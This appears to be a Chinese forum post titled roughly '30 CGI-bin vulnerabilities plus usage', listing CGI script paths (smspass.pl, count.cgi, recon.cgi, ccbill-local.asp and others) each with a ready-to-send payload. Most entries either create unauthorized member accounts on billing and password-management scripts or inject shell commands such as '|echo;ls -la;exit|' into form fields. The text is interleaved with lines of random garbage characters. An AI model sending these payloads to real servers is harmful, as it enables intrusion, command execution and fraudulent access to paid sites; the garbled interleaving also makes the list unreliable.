Cgi-bin 30个漏洞＋使用方法

admin

==============================
3 y' w$ O% g. Y6 u- H5 |* _
/smspass.pl
username=username&password=password

+ {/ i) [  y5 g6 G/ d! R/index.cgi
! I% }0 g; _" H6 q8 h) X2 rwei=ren&gen=command

; B# W9 }- ?) a3 j/passmaster.cgi
6 f2 |" U+ {8 m- z) ^( q7 xAction=Add&Username=Username&Password=Password

# |/ F  z! k$ \) i: m/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|

/form.cgi
4 H$ O; B" x4 sname=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
& m% y1 P: M- _' j7 ]4 T/cgi-bin/EuroDebit/addusr.pl
- @# X4 z0 i! J8 Cuser=username&pass=Password&confirm=Password

/ccbill-local.asp
! G/ @& B3 B2 H/ n9 V4 Z( ]post_values=username:password

8 ]; U; [3 E- J; @1 S1 ?# y/count.cgi
pinfile=|echo;ls -la;exit|
0 G0 g  s( o9 l. I$ _4 t5 Y# p
) U' d4 u$ y+ p3 n/recon.cgi
/recon.cgi?search
' D7 N4 v, ?. j9 msearchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
: W2 g  u) G+ ]% K5 Z1 Svercode=username:password:dseegsow:add:amount<&30>

/af.cgi
) W1 \. v* `2 ?: t8 v, v_browser_out=|echo;ls -la;exit;|
( X' `3 x  r$ a3 m# w/ f% U/ ]
/modify.cgi
username=username&password=password&expire=30

& N) G, U+ {" n. ^1 K7 q) V/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|

4 o6 a2 t0 A0 @7 h; V/gx9passwd.cgi
/ p) ?* D! Z' N% G) o5 Scmd=ADD&user=username&pass=password

$ \9 @2 ]3 O' `: K1 d! k/probecontrol.cgi
9 O8 @, y! Q* f" H* l# Rcommand=enable&username=username&password=password

/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
7 ?; ^# h# e( [8 F
. z% f$ H# U4 |5 C9 K# M- n3 F5 H/htadd.pl
2 |" ]! X* Y" l# Y: Rconfigfile=|echo; ls -alt; exit
8 i9 B& [# ?* `3 D. L" \
- e2 k7 i8 Z8 ^4 Q( Q7 t/gx9passwd.cgi
) g0 R$ W0 j: K  t' O. k/ Xcmd=ADD&user=username&pass=password

/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
+ l, }, X0 R9 B! e& {& I5 c( d% m
/cpay.cgi
8 L, i% z) ]6 K: z! D0 Y4 Lcommand=add_member&username=username(EMAIL)&password=password(DES)
! b; k* E1 V- F# r5 m8 E  @
0 L2 S9 V; Q  C/globill_ut.cgi
6 U( M0 l& ]' t  u" r# q  |do=add&username=username&password=password&wpassword=password

+ z7 ~: j8 D0 c2 q: V6 O/usercontrol.cgi
7 ^& z7 u- L$ U; {5 k; e  _5 bcommand=enable&username=USER&password=PASS
. D% b5 q8 t5 z  T4 n
/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

7 C' x/ Q( o4 J3 C: H& Z, w: H/addusr.pl
user=USER&pass=PASS&confirm=PASS
2 v! F1 Z' q. q5 m6 `% d; Z
. l$ @0 M2 J# Y$ _2 k8 k2 ]0 _: V/pincount.cgi
* {0 m; J' J5 u2 g# f9 d' p/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
% X( [5 w( W- i6 u/ C
/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
" i# `8 z3 g# Cusername=username&password=password&password2=password&ref1=|echo;ls -al;exit
% r4 J! N" L2 O/ `. k; t' D1 I# P* F
7 Y6 N3 J) A) T0 I0 @2 v/af.cgi
/env.cgi
ADD+;echo;pwd;exit
& ]: L+ D( m3 A" W& W
  [  @; c. t# ^& J2 |/count.cgi
pinfile=|echo;pwd;exit|
+ e4 a+ q$ b" p+ \+ _' @
4 j) W0 `. `4 l/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
  }+ X0 w" O6 ^  ~: q
, b& a) z2 u) M/add.cgi
username=username&password=password&expire=30
, I1 n* |- {% ?- ~+ B* [& k- e/ `* c
# w  c( F- C# e' X, n" R# \==============================